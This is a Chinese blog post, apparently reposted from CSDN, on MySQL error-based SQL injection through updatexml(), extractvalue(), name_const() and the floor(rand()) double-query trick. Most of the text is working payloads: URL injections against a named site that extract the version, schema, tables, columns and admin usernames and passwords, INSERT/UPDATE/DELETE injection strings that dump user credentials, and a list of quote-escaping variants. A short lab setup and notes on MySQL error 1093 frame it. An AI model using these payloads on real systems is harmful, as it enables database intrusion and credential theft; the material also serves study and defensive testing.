zoukankan      html  css  js  c++  java
  • 一道综合渗透题引发的updatexml()注入思考

    MYSQL数据库updatexml报错注入
    UPDATEXML (XML_document, XPath_string, new_value); 
    第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 
    第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 
    第三个参数:new_value,String格式,替换查找到的符合条件的数据 


    爆数据库版本信息
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)  
    链接用户
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)  
    链接数据库
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) 
    爆库
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)  
    爆表
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1
    爆字段
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)  
    爆字段内容
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)  


    返回结果为连接参数产生的字符串。如有任何一个参数为NULL ,则返回值为 NULL。


    通过查询@@version,返回版本。然后CONCAT将其字符串化。因为UPDATEXML第二个参数需要Xpath格式的字符串,所以不符合要求,然后报错。

    0x1 准备条件


      a. mysql数据库

      b. 创建用于实验的数据库和表


    Create database newdb; use newdb CREATE TABLE users
    (
    id int(3) NOT NULL AUTO_INCREMENT,
    username varchar(20) NOT NULL,
    password varchar(20) NOT NULL, PRIMARY KEY (id)
    );

    0x2  使用updatexml()函数 
    1. 注入


    a. 载荷格式 :or updatexml(1,concat(0x7e,(version())),0) or


    b. insert注入:INSERT INTO users (id, username, password) VALUES (2,'Pseudo_Z' or updatexml(1,concat(0x7e,(version())),0) or'', 'security-eng');


    c. update注入:UPDATE users SET password='security-eng' or updatexml(2,concat(0x7e,(version())),0) or'' WHERE id=2 and username='Pseudo_Z';


    d. delete注入:DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';


    2. 提取数据


      a. 载荷格式:

      or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or


      b. insert提取表名:  

    INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');


    c. insert提取列名

    INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');


      d. insert进行dump


    INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');


    e. delete进行dump

      DELETE FROM users WHERE id=1 or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '';


    f.update进行dump ? 


      同一个表不能用update进行dump,不同的表却可以


      UPDATE students SET name='Nicky' or Updatexml(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or''   WHERE id=1;


    3.小贴士


      a.报错,然后爆出了要提取的信息


      b. 按照作者paper上的代码,mysql5.6.19, 前面提取信息成功,后面dump报错:[Err] 1093 - You can't specify target table 'users' for update in FROM clause


      c. google之,给出找到的两个参考:


      case1:


       //报错代码  DELETE FROM table_name where coulmn_name IN (SELECT coulmn_name FROM table_name  WHERE coulmn_name > 10);


      //修正代码  DELETE FROM table_name where coulmn_name IN ( SELECT * FROM (SELECT coulmn_name FROM table_name WHERE coulmn_name >          10) AS X) ;


      //说明    不能删除子查询指向的相同数据源中的行,update同理 


      case2:


    技术分享
    CREATE TABLE comments(id int primary key, phrase text, uid int); INSERT INTO comments VALUES(1, 'admin user comments',1),
                               (2, 'HR User Comments',2),
                               (3, 'RH User Comments',2); UPDATE comments SET phrase = (SELECT phrase FROM comments WHERE uid=2 AND id=2) WHERE id = 3; 
    技术分享
      修复代码:


    技术分享
    UPDATE comments SET phrase =( SELECT phrase FROM ( SELECT * FROM comments
                 ) AS c1 WHERE c1.uid=2 AND c1.id=2 ) WHERE id =3;
    技术分享
      说明:当你同时使用子查询读取相同的数据时,mysql不允许update、delete表中的数据;mysql会将from语句中的子查询作为一个临时表,将子查询封装到from语句中更深  层的子查询中会使其被执行并存储的临时表中,然后在外部子查询中隐式引用


    4. updatexml() [ 返回被替换的XML段], updatexml()是mysql中的XML函数,还有一个为extractvalue() [使用Xpath符号从xml字符串中提取值],也是下文要用到的


      eg.   SET @xml = '<a><b>X</b><b>Y</b></a>';


          SET @i =1, @j = 2;
          SELECT @i, ExtractValue(@xml, '//b[$@i]');


      //ExtractValue(xml_frag, xpath_expr)   //UpdateXML(xml_target, xpath_expr, new_xml)


      Xpath有较多限制,如不支持节点集的比较,不支持string()等函数,另外Xpath注入类似于SQL注入,语法上略有不同


     


    0x3 使用extractvalue()函数


      a. 载荷格式:or extractvalue(1,concat(0x7e,database())) or


      b. 注入:


       INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or extractvalue(1,concat(0x7e,database())) or'', 'Pseudo_Z');


        UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2 and username='Pseudo_Z';


        DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or''; 


     


      c.提取数据 


    INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1))) or'', 'balabala');


      dump操作及update、delete方法同上updatexml()

    0x4 使用name_const() //5.0.13中引入,返回任何给定的值


      a. 载荷格式: or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or


      b. 注入:  

    UPDATE users SET password='Nicky' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE 
    id=2 and username='Pseudo_Z';


    c. 提取数据


    INSERT INTO users (id, username, password) VALUES (1,'admin' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1))a) or '', 'oyyoug0d');


    0x5 二次查询注入  //mysql没有二次查询,因此使用子查询  


    1. 注入


    INSERT INTO users (id, username, password) VALUES (1,'r00tgrok' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM 
    information_schema.columns group by x)a) or'', 'Bl4ckhat');


    DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' ;


     


    2. 提取数据  


    INSERT INTO users (id, username, password) VALUES (1, 'Pseudo_Z' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT 
    concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'jesus-2014');


    0x6 其他变种

    ' or (payload) or ' 
    ' and (payload) and ' 
    ' or (payload) and ' 
    ' or (payload) and '=' 
    '* (payload) *' 
    ' or (payload) and ' 
    " – (payload) – "

    参考:

    https://bbs.ichunqiu.com/thread-1953-1-1.html     i春秋综合渗透题

    http://www.mamicode.com/info-detail-1665678.html     

    http://www.freebuf.com/author/%E6%BC%8F%E6%96%97%E7%A4%BE%E5%8C%BA?page=3     Freebuf漏斗社区

    http://www.freebuf.com/column/161797.html     sqlmap payload 修改

    http://www.freebuf.com/column/145988.html     order by排序篇
    ————————————————
    版权声明:本文为CSDN博主「Wh0ale」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
    原文链接:https://blog.csdn.net/m0_37438418/article/details/80260813

  • 相关阅读:

    Windows终端无法通过cd切换盘符目录
    linux工程相对路径读取文件
    Ubuntu常用命令的安装
    vue项目的创建和遇到的一些问题
    超详细!Head First:HTML and CSS的读书笔记
    laravel开发环境部署遇到的问题和个人感受
    java并发:线程池之ScheduledExecutorService
    java并发:线程池之饱和策略
    java并发:线程池之ThreadPoolExecutor
  • 原文地址:https://www.cnblogs.com/0daybug/p/12334495.html
Copyright © 2011-2022 走看看